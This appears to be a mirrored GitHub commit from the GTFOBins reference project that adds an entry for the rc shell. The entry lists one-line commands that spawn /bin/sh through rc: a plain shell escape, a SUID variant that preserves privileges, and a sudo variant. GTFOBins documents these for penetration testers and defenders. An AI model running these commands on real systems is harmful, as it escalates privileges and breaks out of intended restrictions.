mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Add rc
install: apt-get install rc -y man: https://manpages.ubuntu.com/manpages/xenial/man1/rc.1.html
This commit is contained in:
parent
c2bbbd699d
commit
9b2a297c6d
9
_gtfobins/rc.md
Normal file
9
_gtfobins/rc.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: rc -c '/bin/sh'
|
||||
suid:
|
||||
- code: ./rc -c '/bin/sh -p'
|
||||
sudo:
|
||||
- code: sudo rc -c '/bin/sh'
|
||||
---
|
Loading…
Reference in New Issue
Block a user